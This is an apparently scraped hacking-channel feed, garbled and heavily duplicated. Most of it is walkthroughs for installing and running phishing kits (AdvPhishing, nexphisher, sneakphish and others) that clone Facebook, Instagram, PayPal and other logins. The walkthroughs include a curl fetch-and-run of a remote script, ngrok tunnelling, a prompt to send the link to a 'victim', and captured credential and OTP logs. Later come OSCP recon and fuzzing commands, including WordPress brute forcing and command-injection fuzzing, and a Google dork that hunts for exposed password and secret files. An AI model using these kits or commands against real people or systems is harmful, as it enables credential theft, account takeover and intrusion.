ยถยถ server.sh
#phishing #facebook #twitter #instagram #google #paypal #github
๐apt update && apt upgrade
๐apt-get install curl -y
curl -LO https://raw.githubusercontent.com/sachin175638/server1/master/server.sh
๐chmod + server.sh
๐sh server.sh
๐sh ser.sh
[1] - Localhost
[2] - Webhost
[3] - Phishing server
[4] - Check Logs
[5] - Download ngrok
[6] - Check Update
[7] - Create payload
[8] - Start lisitner
[9] - IP_tools
[10] - http file server
{99} - exit
[+] Select >> 3
#phishing #facebook #twitter #instagram #google #paypal #github
๐apt update && apt upgrade
๐apt-get install curl -y
curl -LO https://raw.githubusercontent.com/sachin175638/server1/master/server.sh
๐chmod + server.sh
๐sh server.sh
๐sh ser.sh
[1] - Localhost
[2] - Webhost
[3] - Phishing server
[4] - Check Logs
[5] - Download ngrok
[6] - Check Update
[7] - Create payload
[8] - Start lisitner
[9] - IP_tools
[10] - http file server
{99} - exit
[+] Select >> 3
๐2
ยถยถAdvPhishing
#phishing #facebook #instagram #whatsapp #hotstar #github #google #ngrok
git clone https://github.com/Ignitetch/AdvPhishing
cd AdvPhishing
ls
chmod 777 start.sh
./start.sh
./An-AdvPhishing.sh
ยถยถ Full commands ๐๐
#phishing #facebook #instagram #whatsapp #hotstar #github #google #ngrok
git clone https://github.com/Ignitetch/AdvPhishing
cd AdvPhishing
ls
chmod 777 start.sh
./start.sh
./An-AdvPhishing.sh
ยถยถ Full commands ๐๐
ยถยถAdvPhishing
#phishing #facebook #instagram #whatsapp #hotstar #github #google #ngrok
git clone https://github.com/Ignitetch/AdvPhishing
cd AdvPhishing
ls
chmod 777 start.sh
./start.sh
./An-AdvPhishing.sh
ยถยถ Follow instruction
go to ngrok.com /signup creat a acct and copy ./ngrok authtoken also ..
-----------------------------------------------------------------------
SELECT ANY ATTACK
--------------------- > > >
[01] Zomato-TF0 [09] Instagram-Followers [99] Exit
[02] Facebook-TFO [10] Amazon-TFO
[03] Instagram-TFO [11] WhatsApp-TFO
[04] Uber Eats-TFO [12] Linkedin-TFO
[05] OLA-TFO [13] Hotstar-TFO
[06] Google-TFO [14] Spotify-TFO
[07] Paytm-TFO [15] Github-TFO
[08] Netflix-TFO [16] IPFinder
-----------------------------------------------------------------------
[ <<>> ] Enter Your Choice : 2 (facebook)
[ <<>> ] // STARTING PHP SERVER //
[ <<>> ] // STARTING NGROK SERVER //
[ <<>> ] Send this link to the Target : victim https://link.ngrok.io
// CREDENTIAL //
++log++
email=testing
pass=testing122
approvals_code=202020
ยถยถ Youtube link
https://m.youtube.com/watch?feature=youtu.be&v=SDuaVMjph-c
#phishing #facebook #instagram #whatsapp #hotstar #github #google #ngrok
git clone https://github.com/Ignitetch/AdvPhishing
cd AdvPhishing
ls
chmod 777 start.sh
./start.sh
./An-AdvPhishing.sh
ยถยถ Follow instruction
go to ngrok.com /signup creat a acct and copy ./ngrok authtoken also ..
-----------------------------------------------------------------------
SELECT ANY ATTACK
--------------------- > > >
[01] Zomato-TF0 [09] Instagram-Followers [99] Exit
[02] Facebook-TFO [10] Amazon-TFO
[03] Instagram-TFO [11] WhatsApp-TFO
[04] Uber Eats-TFO [12] Linkedin-TFO
[05] OLA-TFO [13] Hotstar-TFO
[06] Google-TFO [14] Spotify-TFO
[07] Paytm-TFO [15] Github-TFO
[08] Netflix-TFO [16] IPFinder
-----------------------------------------------------------------------
[ <<>> ] Enter Your Choice : 2 (facebook)
[ <<>> ] // STARTING PHP SERVER //
[ <<>> ] // STARTING NGROK SERVER //
[ <<>> ] Send this link to the Target : victim https://link.ngrok.io
// CREDENTIAL //
++log++
email=testing
pass=testing122
approvals_code=202020
ยถยถ Youtube link
https://m.youtube.com/watch?feature=youtu.be&v=SDuaVMjph-c
GitHub
GitHub - Ignitetch/AdvPhishing: This is Advance Phishing Tool ! OTP PHISHING
This is Advance Phishing Tool ! OTP PHISHING. Contribute to Ignitetch/AdvPhishing development by creating an account on GitHub.
ยถยถAdvPhishing
#phishing #facebook #instagram #whatsapp #hotstar #github #google #ngrok
git clone https://github.com/Ignitetch/AdvPhishing
๐cd AdvPhishing
๐ls
๐chmod 777 start.sh
๐./start.sh
๐./An-AdvPhishing.sh
ยถยถ Nethunter
๐sudo ./start.sh
ยถยถ ./ngrok your authtoken .......
๐sudo ./An-AdvPhishing.sh
#phishing #facebook #instagram #whatsapp #hotstar #github #google #ngrok
git clone https://github.com/Ignitetch/AdvPhishing
๐cd AdvPhishing
๐ls
๐chmod 777 start.sh
๐./start.sh
๐./An-AdvPhishing.sh
ยถยถ Nethunter
๐sudo ./start.sh
ยถยถ ./ngrok your authtoken .......
๐sudo ./An-AdvPhishing.sh
ยถยถ Recreator-Phishing
PHISHING WEBSITE
#weeman shellphish #facebook #instagram #github #tiktok
pkg update && pkg upgrade
pkg install python
pip install requests
pkg install git bash
git clone https://github.com/AngelSecurityTeam/Recreator-Phishing
cd Recreator-Phishing
ls
bash install.sh
python3 ServerInstall.py
python3 recreator-phishing.py
[@]url = https://www.site.com [@]port = START SERVER :
1)SERVEO
2)NGROK
3)LOCALXPOSE
4)LOCALHOST
5)LOCALRUN
OPTIONS : 2
NGROK URL : https://link.ngrok.io
ยถยถ for login check >save.txt<
PHISHING WEBSITE
#weeman shellphish #facebook #instagram #github #tiktok
pkg update && pkg upgrade
pkg install python
pip install requests
pkg install git bash
git clone https://github.com/AngelSecurityTeam/Recreator-Phishing
cd Recreator-Phishing
ls
bash install.sh
python3 ServerInstall.py
python3 recreator-phishing.py
[@]url = https://www.site.com [@]port = START SERVER :
1)SERVEO
2)NGROK
3)LOCALXPOSE
4)LOCALHOST
5)LOCALRUN
OPTIONS : 2
NGROK URL : https://link.ngrok.io
ยถยถ for login check >save.txt<
ยถยถ SocialSploit
#phishing
#Facebook-likes #Facebook-Security #Facebook-Amigos #Facebook-Color #Facebook-Gratuito #Facebook-Home #Facebook #Facebook #Facebook2 #Facebook-War #YouTube #Awaker #hotmail #instagram #netflix #Paypal #snapchat #Spotify #Yahoo #Github
[+] PHISHING->
๐pkg update
๐pkg upgrade
๐git clone https://github.com/Cesar-Hack-Gray/SocialSploit
๐cd SocialSploit
๐bash install.sh
๐./Sploit
[+] PHISHING->
#phishing
#Facebook-likes #Facebook-Security #Facebook-Amigos #Facebook-Color #Facebook-Gratuito #Facebook-Home #Facebook #Facebook #Facebook2 #Facebook-War #YouTube #Awaker #hotmail #instagram #netflix #Paypal #snapchat #Spotify #Yahoo #Github
[+] PHISHING->
๐pkg update
๐pkg upgrade
๐git clone https://github.com/Cesar-Hack-Gray/SocialSploit
๐cd SocialSploit
๐bash install.sh
๐./Sploit
[+] PHISHING->
ยถยถ nexphish
#phishing #socialmedia #facebook #instagram #google #github #wordpress #protonmail #paypal #shellphish
ยถยถ Full Command ๐๐
#phishing #socialmedia #facebook #instagram #google #github #wordpress #protonmail #paypal #shellphish
ยถยถ Full Command ๐๐
ยถยถ nexphish
#phishing #socialmedia #facebook #instagram #google #github #wordpress #protonmail #paypal #shellphish
๐pkg update && pkg upgrade
๐pkg install git bash
๐git clone https://github.com/htr-tech/nexphisher
๐cd nexphish
๐ls
๐bash setup
๐bash tmux_setup
๐bash nexphisher
-------------------------------------
ยถยถ Tunelling Options :
> Localhost (127.0.0.1)
> NGROK (https://ngrok.com)
> SERVEO (https://serveo.net)
> LOCALHOSTRUN (https://localhost.run)
> LOCALXPOSE (https://localxpose.io/)
[01] Facebook [16] Dropbox
[02] Instagram [17] Protonmail
[03] Google [18] Spotify
[04] Microsoft [19] Reddit
[05] Netflix [20] Adobe
[06] Paypal [21] DeviantArt
[07] Steam [22] Badoo
[08] Twitter [23] Origin
[09] Playstation [24] CryptoCoin
[10] Github [25] Yahoo
[11] Twitch [26] Wordpress
[12] Pinterest [27] Yandex
[13] Snapchat [28] StackoverFlow
[14] Linkedin [29] Vk
[15] Ebay [30] XBOX
[99] About [00] Exit
[~] Select an option:
ยถยถ Go to bitly.com and shorten your link
#phishing #socialmedia #facebook #instagram #google #github #wordpress #protonmail #paypal #shellphish
๐pkg update && pkg upgrade
๐pkg install git bash
๐git clone https://github.com/htr-tech/nexphisher
๐cd nexphish
๐ls
๐bash setup
๐bash tmux_setup
๐bash nexphisher
-------------------------------------
ยถยถ Tunelling Options :
> Localhost (127.0.0.1)
> NGROK (https://ngrok.com)
> SERVEO (https://serveo.net)
> LOCALHOSTRUN (https://localhost.run)
> LOCALXPOSE (https://localxpose.io/)
[01] Facebook [16] Dropbox
[02] Instagram [17] Protonmail
[03] Google [18] Spotify
[04] Microsoft [19] Reddit
[05] Netflix [20] Adobe
[06] Paypal [21] DeviantArt
[07] Steam [22] Badoo
[08] Twitter [23] Origin
[09] Playstation [24] CryptoCoin
[10] Github [25] Yahoo
[11] Twitch [26] Wordpress
[12] Pinterest [27] Yandex
[13] Snapchat [28] StackoverFlow
[14] Linkedin [29] Vk
[15] Ebay [30] XBOX
[99] About [00] Exit
[~] Select an option:
ยถยถ Go to bitly.com and shorten your link
GitHub
GitHub - htr-tech/nexphisher: Advanced Phishing tool
Advanced Phishing tool. Contribute to htr-tech/nexphisher development by creating an account on GitHub.
ยถยถ sneakphish
#phishing #socialmedia #termux
#facebook #insta #twitter #github #instagramfollowers #amazon #pubg #netflix #wordpress #TermuxToolx
ยถยถ sneakphish is a bash based script which is officially made for phishing social media accounts
๐apt-get update && apt upgrade -y
๐pkg install curl wget php git
๐git clone https://github.com/noob-hackers/sneakphish
๐cd $HOME
๐cd sneakphish
๐ls
๐bash sneakphish.sh
--------
[1]---START
[2]---UPDATE
[3]---ABOUT
[4]---MORE
[5]---FOLLOW
[6]---VIDEO
[7]---CHAT NOW
[8]---RESTART
[9]---EXIT
--------
START : - From this option you can start attack and explore available option in tool Type ok in next step.
DUMPS : - From this option you can get old saved dumps of all ids.
ABOUT : - From this option you can know more about author.
UPDATE : - From this option you can update mrphish tool if updates are available for that.
SUBSCRIBE : - From this option you can easily subscribe our official channel.
EXIT : - From this option you can exit from tool ## SCREEN SHOTS [Termux]
#phishing #socialmedia #termux
#facebook #insta #twitter #github #instagramfollowers #amazon #pubg #netflix #wordpress #TermuxToolx
ยถยถ sneakphish is a bash based script which is officially made for phishing social media accounts
๐apt-get update && apt upgrade -y
๐pkg install curl wget php git
๐git clone https://github.com/noob-hackers/sneakphish
๐cd $HOME
๐cd sneakphish
๐ls
๐bash sneakphish.sh
--------
[1]---START
[2]---UPDATE
[3]---ABOUT
[4]---MORE
[5]---FOLLOW
[6]---VIDEO
[7]---CHAT NOW
[8]---RESTART
[9]---EXIT
--------
START : - From this option you can start attack and explore available option in tool Type ok in next step.
DUMPS : - From this option you can get old saved dumps of all ids.
ABOUT : - From this option you can know more about author.
UPDATE : - From this option you can update mrphish tool if updates are available for that.
SUBSCRIBE : - From this option you can easily subscribe our official channel.
EXIT : - From this option you can exit from tool ## SCREEN SHOTS [Termux]
๐1
ยถยถ A Curated List of Awesome Telegram OSINT Tools, Sites & Resources
#telegram #osint #github
Search Engines
Tools
Telegram Bots
ยถยถ Link below ๐๐
https://github.com/ItIsMeCall911/Awesome-Telegram-OSINT
#telegram #osint #github
Search Engines
Tools
Telegram Bots
ยถยถ Link below ๐๐
https://github.com/ItIsMeCall911/Awesome-Telegram-OSINT
GitHub
GitHub - ItIsMeCall911/Awesome-Telegram-OSINT: ๐ A Curated List of Awesome Telegram OSINT Tools, Sites & Resources
๐ A Curated List of Awesome Telegram OSINT Tools, Sites & Resources - ItIsMeCall911/Awesome-Telegram-OSINT
๐2โค1
๐จโ๐ป Now, I'm sharing my code and notes to help You!!๐ฏ
๐ Check out
#nmap
==-Nmap====
nmap -p- -sT -sV -A $IP
nmap -p- -sC -sV $IP --0pen
nmap -p- --script=vuln $IP
###HTTP-Methods
nmap --script http-methods --script-args
http-methods. url-path='/webs ite '
###
sed IPs:
grep -oE '((1? [0-9] [0-9]? |2[0-4] [0-
9] |25[0-5])\.){3} (1? [0-9] [0-9]? |2 [0-4]
[0-9] |25 [0-5] ) ' FILE
--Script smb-enum-shares
=EE=======
=E==EE====E============E==
EEE=E==E==:
=========:
==
WPScan & SSL
wpscan--url $URL --disable-tls-checks -
-enumerate p --enumerate t --enumerate u
===WPScan Brute Forceing:
wpscan --url $URL --disable-t ls-checks -
U users -P
/usr/share/wordlists/ rockyou. txt
==Aggressive Plugin Detection:
wpscan --url $URL
plugins-detection aggressive
--enumerate p
========================================
c==Nikto with SSL and Evasion
nikto --host $IP -ssl -evasion 1
SEE EVASION MODALITIES.
E===================================
==dns_recon
dnsrecon -d yourdomain. com
==
===9obuster directory
gobuster dir -u $URL -W
/opt/SecLists/Dis covery/Web-
Content/ raft-medium-directories. txt -k -
t 30
===gobuster files
gobuster dir -u $URL -W
/opt/SecLists/Dis covery/Web-
Content/raft-medium-files. txt -k -t 30
==00buster for SubDoma in brute forcing:
gobuster dns -d doma in.org -w
/opt/SecLists/Discovery/DNS/subdomains-
toplmillion-110000. txt -t 30
"just make sure any DNS name you find
resolves to an in-scope address before
you test it!
====E=======:
=H==E====E====E===E====
==Extract IPs from a text file.
grep -o '[0-9]\{1, 3\}\. [0-9]\{1,3\}\. [0-
9]\{1,3\}\. [0-9]\{1, 3\}' nmapfile. txt
===Wfuzz XSS
Fuzzing===:
wfuzz -C -Z
file, /opt/SecLists/Fuzzing/XSS,/XSS-
BruteLogic. txt "$URL"
wfuzz -C -Z
file, /opt/SecLists/ Fuzzing/XSS,/XSS-
JhaddiX. txt "$URL"
===C0MMAND INJECTION WITH POST DATA
wfuzz -C -Z
file, /opt/SecLists/Fuzzing/command-
injection-commix. txt -d "doi=FUZZ"
"$URL"
===Test for Paramter Existence!
wfuzz -C -Z
file, /opt/SecLists/Dis covery /Web-
Content/burp-parameter-names. txt "$URL"
===AUTHENTICATED FUZZING DIRECTORIES:
wfuzz -C -Z
file, /opt/SecLists/Dis cove ry/Web-
Content/ raft-medium-directories . txt --hc
404 -d "SESSIONID=value" "$URL"
=AUTHENTICATED FILE FUZZING:
wfuzz -C -Z
file, /opt/SecLists/Discove ry/Web-
Content/ raft-med ium-files . txt --hc 404 -
d "SESSIONID=value" "$URL"
===FUZZ Directories :
wfuzz -C -Z
file, /opt/SecLists/Dis covery/Web-
Content/ raft-la rge-d irectories. txt --hc
404 "$URL"
===FUZZ FILES:
wfuzz -C -Z
file, /opt/SecLists/Dis covery/Web-
Content/ raft-la rge-files . txt --hc 404
"$URL"
๐ Learn, practice, and let's achieve OSCP success together! ๐ช๐
#OSCP #Cybersecurity #EthicalHacking #TwisterMachine #InfoSec #GitHub #LearnToHack @SaveToNotion @threadreaderapp
๐ Searching for sensitive files on the web? Here's a Google dork to find filenames that might contain sensitive information. Use it responsibly! #InfoSec #Security #GoogleDork #bugbountytips @SaveToNotion @threadreaderapp
๐Google dork for searching these filenames on Google:
intext:"filename:config.php" OR
intext:"filename:config.inc.php" OR
intext:"filename:prod.secret.exs" OR
intext:"filename:configuration.php" OR
intext:"filename:.sh_history" OR
intext:"filename:shadow" OR
intext:"filename:proftpdpasswd" OR
intext:"filename:.psafe3" OR
intext:"filename:.pgpass" OR
intext:"filename:manifest.xml" OR
intext:"filename:travis.yml" OR
intext:"filename:vim_settings.xml" OR
intext:"filename:database" OR
intext:"filename:prod.exs" OR
intext:"filename:prod.secret.exs" OR
intext:"filename:.npmrc _auth" OR
intext:"filename:.dockercfg" OR
intext:"filename:WebServers.xml" OR
intext:"filename:.bash_history" OR
intext:"filename:sftp-config.json" OR
intext:"filename:sftp.json" OR
intext:"filename:secrets.yml" OR
intext:"filename:.esmtprc" OR
https://twitter.com/TheMsterDoctor1/status/1754409763914354705?s=19
๐ Check out
#nmap
==-Nmap====
nmap -p- -sT -sV -A $IP
nmap -p- -sC -sV $IP --0pen
nmap -p- --script=vuln $IP
###HTTP-Methods
nmap --script http-methods --script-args
http-methods. url-path='/webs ite '
###
sed IPs:
grep -oE '((1? [0-9] [0-9]? |2[0-4] [0-
9] |25[0-5])\.){3} (1? [0-9] [0-9]? |2 [0-4]
[0-9] |25 [0-5] ) ' FILE
--Script smb-enum-shares
=EE=======
=E==EE====E============E==
EEE=E==E==:
=========:
==
WPScan & SSL
wpscan--url $URL --disable-tls-checks -
-enumerate p --enumerate t --enumerate u
===WPScan Brute Forceing:
wpscan --url $URL --disable-t ls-checks -
U users -P
/usr/share/wordlists/ rockyou. txt
==Aggressive Plugin Detection:
wpscan --url $URL
plugins-detection aggressive
--enumerate p
========================================
c==Nikto with SSL and Evasion
nikto --host $IP -ssl -evasion 1
SEE EVASION MODALITIES.
E===================================
==dns_recon
dnsrecon -d yourdomain. com
==
===9obuster directory
gobuster dir -u $URL -W
/opt/SecLists/Dis covery/Web-
Content/ raft-medium-directories. txt -k -
t 30
===gobuster files
gobuster dir -u $URL -W
/opt/SecLists/Dis covery/Web-
Content/raft-medium-files. txt -k -t 30
==00buster for SubDoma in brute forcing:
gobuster dns -d doma in.org -w
/opt/SecLists/Discovery/DNS/subdomains-
toplmillion-110000. txt -t 30
"just make sure any DNS name you find
resolves to an in-scope address before
you test it!
====E=======:
=H==E====E====E===E====
==Extract IPs from a text file.
grep -o '[0-9]\{1, 3\}\. [0-9]\{1,3\}\. [0-
9]\{1,3\}\. [0-9]\{1, 3\}' nmapfile. txt
===Wfuzz XSS
Fuzzing===:
wfuzz -C -Z
file, /opt/SecLists/Fuzzing/XSS,/XSS-
BruteLogic. txt "$URL"
wfuzz -C -Z
file, /opt/SecLists/ Fuzzing/XSS,/XSS-
JhaddiX. txt "$URL"
===C0MMAND INJECTION WITH POST DATA
wfuzz -C -Z
file, /opt/SecLists/Fuzzing/command-
injection-commix. txt -d "doi=FUZZ"
"$URL"
===Test for Paramter Existence!
wfuzz -C -Z
file, /opt/SecLists/Dis covery /Web-
Content/burp-parameter-names. txt "$URL"
===AUTHENTICATED FUZZING DIRECTORIES:
wfuzz -C -Z
file, /opt/SecLists/Dis cove ry/Web-
Content/ raft-medium-directories . txt --hc
404 -d "SESSIONID=value" "$URL"
=AUTHENTICATED FILE FUZZING:
wfuzz -C -Z
file, /opt/SecLists/Discove ry/Web-
Content/ raft-med ium-files . txt --hc 404 -
d "SESSIONID=value" "$URL"
===FUZZ Directories :
wfuzz -C -Z
file, /opt/SecLists/Dis covery/Web-
Content/ raft-la rge-d irectories. txt --hc
404 "$URL"
===FUZZ FILES:
wfuzz -C -Z
file, /opt/SecLists/Dis covery/Web-
Content/ raft-la rge-files . txt --hc 404
"$URL"
๐ Learn, practice, and let's achieve OSCP success together! ๐ช๐
#OSCP #Cybersecurity #EthicalHacking #TwisterMachine #InfoSec #GitHub #LearnToHack @SaveToNotion @threadreaderapp
๐ Searching for sensitive files on the web? Here's a Google dork to find filenames that might contain sensitive information. Use it responsibly! #InfoSec #Security #GoogleDork #bugbountytips @SaveToNotion @threadreaderapp
๐Google dork for searching these filenames on Google:
intext:"filename:config.php" OR
intext:"filename:config.inc.php" OR
intext:"filename:prod.secret.exs" OR
intext:"filename:configuration.php" OR
intext:"filename:.sh_history" OR
intext:"filename:shadow" OR
intext:"filename:proftpdpasswd" OR
intext:"filename:.psafe3" OR
intext:"filename:.pgpass" OR
intext:"filename:manifest.xml" OR
intext:"filename:travis.yml" OR
intext:"filename:vim_settings.xml" OR
intext:"filename:database" OR
intext:"filename:prod.exs" OR
intext:"filename:prod.secret.exs" OR
intext:"filename:.npmrc _auth" OR
intext:"filename:.dockercfg" OR
intext:"filename:WebServers.xml" OR
intext:"filename:.bash_history" OR
intext:"filename:sftp-config.json" OR
intext:"filename:sftp.json" OR
intext:"filename:secrets.yml" OR
intext:"filename:.esmtprc" OR
https://twitter.com/TheMsterDoctor1/status/1754409763914354705?s=19
X (formerly Twitter)
X (@TheMsterDoctor1) on X
๐ Exciting News! ๐ I've just conquered the Twister machine in my OSCP journey!
#Day7๐ต๏ธโโ๏ธ๐ป
๐จโ๐ป Now, I'm sharing my code and notes to help You!!๐ฏ
๐ Check out
==-Nmap====
nmap -p- -sT -sV -A $IP
nmap -p- -sC -sV $IP --0pen
nmap -p- --script=vuln $IP
###HTTPโฆ
#Day7๐ต๏ธโโ๏ธ๐ป
๐จโ๐ป Now, I'm sharing my code and notes to help You!!๐ฏ
๐ Check out
==-Nmap====
nmap -p- -sT -sV -A $IP
nmap -p- -sC -sV $IP --0pen
nmap -p- --script=vuln $IP
###HTTPโฆ
๐8โค6